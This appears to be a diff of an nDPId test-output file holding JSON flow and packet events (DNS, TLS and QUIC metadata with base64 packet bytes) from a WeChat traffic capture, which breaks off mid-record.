+01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":898,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167639887,"flow_last_seen":1492167640523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167640523,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":936,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648243,"flow_last_seen":1492167648243,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1492167648243,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":936,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1492167648243,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1492167648243,"pkt":"8IQvSpdgeJKcD6iOCABFAAA7101AAEAR3q7AqAFnwKgB\/kphADUAJzTVMN0BAAABAAAAAAAAA3JlcwJ3eAJxcQNjb20AAAEAAQ=="} 
00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":936,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648243,"flow_last_seen":1492167648243,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1492167648243,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"res.wx.qq.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 01096{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1492167648277,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":537,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":537,"pkt_l4_len":503,"thread_ts_msec":1492167648277,"pkt":"eJKcD6iO8IQvSpdgCABFoAILAABAAEARs4zAqAH+wKgBZwA1SmEB91rcMN2BgAABAA0AAgAMA3JlcwJ3eAJxcQNjb20AAAEAAcAMAAUAAQAADgoACwVyZXN3eAJ0Y8ATwCsABQABAAAALgANBXJlc3d4BHRjZG7AE8BCAAUAAQAAAC8ABgNzc2TAMcBbAAUAAQAAAhgABgNzc2TASMBtAAEAAQAAAIwABMvNniLAbQABAAEAAACMAATLzZfUwG0AAQABAAAAjAAEy82eNcBtAAEAAQAAAIwABMvNnjfAbQABAAEAAACMAATLzZfjwG0AAQABAAAAjAAEy82eI8BtAAEAAQAAAIwABMvNnjjAbQABAAEAAACMAATLzZfTwG0AAQABAAAAjAAEy82eNsBIAAIAAQAANa8ACgducy1jZG4xwBPASAACAAEAADWvAAoHbnMtY2RuMsATwQ8AAQABAAACoQAEtv4QccEPAAEAAQAAAqEABLhpznrBDwABAAEAAAKhAAQOEROMwQ8AAQABAAACoQAEZwce7sEPAAEAAQAAAqEABHt+dlDBDwABAAEAAAKhAAS0oxYuwSUAAQABAAACoQAEtv4LcsElAAEAAQAAAqEABLb+bmTBJQABAAEAAAKhAATLzZfxwSUAAQABAAACoQAEDhEsW8ElAAEAAQAAAqEABHBaSWTBJQABAAEAAAKhAAR9Jy3o"} 
00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":938,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167648243,"flow_last_seen":1492167648277,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1492167648277,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"res.wx.qq.com","num_queries":1,"num_answers":27,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.158.34"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":939,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648277,"flow_last_seen":1492167648277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167648277,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":939,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1492167648277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167648277,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8euFAAEAGk9vAqAFny82eIqtKAbscYaCqAAAAAKACchBlYgAAAgQFtAQCCAoAMdpLAAAAAAEDAwc="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":940,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648494,"flow_last_seen":1492167648494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167648494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43851,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":940,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1492167648494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167648494,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8\/\/9AAEAGDr3AqAFny82eIqtLAbsShiV+AAAAAKACchDqMgAAAgQFtAQCCAoAMdqBAAAAAAEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":941,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1492167648582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167648582,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0AABAADEGHSXLzZ4iwKgBZwG7q0qHWOtEHGGgq4ASOQgtSgAAAgQFtAEBBAIBAwMH"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":942,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1492167648582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167648582,"pkt":"8IQvSpdgeJKcD6iOCABFAAAoeuJAAEAGk+7AqAFny82eIqtKAbscYaCrh1jrRVAQAOWmPwAA"} 
-00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":943,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167648277,"flow_last_seen":1492167648583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1492167648583,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":945,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1492167648873,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167648873,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0AABAADEGHSXLzZ4iwKgBZwG7q0tO\/rLJEoYlf4ASOQgjJgAAAgQFtAEBBAIBAwMH"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":946,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1492167648873,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167648873,"pkt":"8IQvSpdgeJKcD6iOCABFAAAoAABAAEAGDtHAqAFny82eIqtLAbsShiV\/Tv6yylAQAOWcGwAA"} 
-01006{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":968,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167648277,"flow_last_seen":1492167648902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1492167648902,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"290adf098a54ade688d1df074dbecbf2","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1"}} -01570{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":970,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167648277,"flow_last_seen":1492167648903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3430,"flow_tot_l4_payload_len":5407,"flow_avg_l4_payload_len":675,"midstream":0,"thread_ts_msec":1492167648903,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","server_names":"wx1.qq.com,webpush.wx.qq.com,webpush1.weixin.qq.com,loginpoll.weixin.qq.com,login.wx.qq.com,file.wx2.qq.com,wx2.qq.com,login.wx2.qq.com,wxitil.qq.com,file.wx.qq.com,login.weixin.qq.com,webpush2.weixin.qq.com,webpush.wx2.qq.com,webpush.weixin.qq.com,web.weixin.qq.com,res.wx.qq.com,wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"290adf098a54ade688d1df074dbecbf2","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=CN, ST=Guangdong, L=Shenzhen, O=Shenzhen Tencent Computer Systems Company Limited, OU=R&D, CN=wx.qq.com","alpn":"h2,http\/1.1","fingerprint":"67:53:57:7F:22:BB:D0:A6:D4:5F:A6:D4:B3:0A:13:73:29:23:D0:C9"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":939,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648277,"flow_last_seen":1492167648277,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167648277,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":939,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1492167648277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167648277,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8euFAAEAGk9vAqAFny82eIqtKAbscYaCqAAAAAKACchBlYgAAAgQFtAQCCAoAMdpLAAAAAAEDAwc="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":940,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648494,"flow_last_seen":1492167648494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167648494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43851,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":940,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1492167648494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167648494,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8\/\/9AAEAGDr3AqAFny82eIqtLAbsShiV+AAAAAKACchDqMgAAAgQFtAQCCAoAMdqBAAAAAAEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":941,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1492167648582,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167648582,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0AABAADEGHSXLzZ4iwKgBZwG7q0qHWOtEHGGgq4ASOQgtSgAAAgQFtAEBBAIBAwMH"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":942,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1492167648582,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167648582,"pkt":"8IQvSpdgeJKcD6iOCABFAAAoeuJAAEAGk+7AqAFny82eIqtKAbscYaCrh1jrRVAQAOWmPwAA"} 
+00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":943,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167648277,"flow_last_seen":1492167648583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1492167648583,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":945,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1492167648873,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167648873,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0AABAADEGHSXLzZ4iwKgBZwG7q0tO\/rLJEoYlf4ASOQgjJgAAAgQFtAEBBAIBAwMH"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":946,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1492167648873,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167648873,"pkt":"8IQvSpdgeJKcD6iOCABFAAAoAABAAEAGDtHAqAFny82eIqtLAbsShiV\/Tv6yylAQAOWcGwAA"} 
+01006{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":968,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167648277,"flow_last_seen":1492167648902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1492167648902,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"290adf098a54ade688d1df074dbecbf2","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1"}} +01570{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":970,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167648277,"flow_last_seen":1492167648903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3430,"flow_tot_l4_payload_len":5407,"flow_avg_l4_payload_len":675,"midstream":0,"thread_ts_msec":1492167648903,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","server_names":"wx1.qq.com,webpush.wx.qq.com,webpush1.weixin.qq.com,loginpoll.weixin.qq.com,login.wx.qq.com,file.wx2.qq.com,wx2.qq.com,login.wx2.qq.com,wxitil.qq.com,file.wx.qq.com,login.weixin.qq.com,webpush2.weixin.qq.com,webpush.wx2.qq.com,webpush.weixin.qq.com,web.weixin.qq.com,res.wx.qq.com,wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"290adf098a54ade688d1df074dbecbf2","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=CN, ST=Guangdong, L=Shenzhen, O=Shenzhen Tencent Computer Systems Company Limited, OU=R&D, CN=wx.qq.com","alpn":"h2,http\/1.1","fingerprint":"67:53:57:7F:22:BB:D0:A6:D4:5F:A6:D4:B3:0A:13:73:29:23:D0:C9"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":997,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167650311,"flow_last_seen":1492167650311,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167650311,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1492167650311,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1492167650311,"pkt":"8IQvSpdgeJKcD6iOCABFAAA916xAAEAR3k3AqAFnwKgB\/uySADUAKTCBKzkBAAABAAAAAAAAA3NzbAdnc3RhdGljA2NvbQAAAQAB"} 
00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167650311,"flow_last_seen":1492167650311,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167650311,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -291,79 +291,78 @@ 00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":999,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167650348,"flow_last_seen":1492167650348,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1492167650348,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":35601,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"ssl.gstatic.com","user_agent":"Chrome\/57.0.2987.133 Linux x86_64"}} 00922{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1000,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1492167650348,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":400,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":400,"pkt_l4_len":366,"thread_ts_msec":1492167650348,"pkt":"8IQvSpdgeJKcD6iOCABFAAGCbiZAAEARRRnAqAFnrNkXQ4sRAbsBbnP9DSoBZwIONIO7UTAzNQLoUPe6\/kTOTlflPotTtybyc+JAmHNEvZwUaT+Y9MqSJDNXVlUHwBVN0wAQzobHU4rvOkVihYNG2ScjXRicw6QFTtMMe25DwzQ7F0UKP\/Y\/8HMbQmw9b+v7cjBNs8yLamuYyeUaQ6lA73AshAIuQPhL6IslIuIHWs+l0MLo2wd57CZSUFbeEQQGDWtD8b5mwEuaZ88hm8yA3WeZQ9Zu4UUro5Belh+M9DB8RCMbVDEQZk6oJR+FSwF3TriZCorpIzSRESc2crvu7FP1Tb9g0NyoL87e9cFlDFVypNQfdhNO+iEyVuMUtOGb6OQn1vrWvB\/icrLc4DopKhApNyBIG\/+MQmYuPalP+mCA4FXxaPeMi1RdjyuuqxJb39HK+6wmJsCzWDR6cvDTk6ywHmETP0AOjEu+QTifJk6chcMbgKmp0ErfBPvocLYD7Yj8Qw2lL48a1tEWZIz4lw=="} 
02264{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1492167650401,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1492167650401,"pkt":"eJKcD6iO8IQvSpdgCABFoAViAABAADcRt7+s2RdDwKgBZwG7ixEFTkCsBPCmO80d\/CW5IJoqjbn6lzjr5TC1v3d2foeU3jLNcA4IAV35th92JTinR3E92La4uW3lsByHG3R1axVDDHGrIc2Dhs2S+7aBzkyVbwcuUK77hYdmfJ4TJuEFhTaYjceo9r51oYeJqOHOCc1BBmB5E+A58P\/H55fRg4dxRA9v1f2aVQ6I67HK4M7mS7147fzZ170E12rNhRLBsPAWwZ8U93ZWKjAcVK9waq7ihKZ\/GTyfNPuOCQnhcxCFRMVEx2xx65NSFauaw3a1qVgRV428j6Bchcyom0cvPgxBbWJUmObxkeqmQAFmTPCN6igcJnamWF5CRIXtlRtvIVi8G3Rds0EdWXNYvxaTSkwCziFaIH6mAaz9hCwjxATLUAdqd1Yo+wN5ikpGmpiBzh3Coj125lb7YXMKgdIF\/8K12iKaeICQ1ArpMEt9vvWxk35P363XmPN9SjUjvFqh8rl+ETiuGHzQwTYDZUwFRT8Tnc90FuuWkSHrjLuI78eE0u2MPArYDWbkXnAkM9f\/B1mpEGpwrQCQA0PHuwaHNDaEcqfk+htDhYfF2k76y25VNuFHeOfHnAe8W\/L6MSq0NvvJdxpclRqAM5S2hcBrDwho6FgiBa0XuPrQx61q\/3nmcTSWb0DXXos+FWaLGj1Jg4cyk4xSeKoZfxTTY8qOxPxWcSNcXXGMVMwz3NtJzwB28A6uPq8NBF+APnNiUzkLE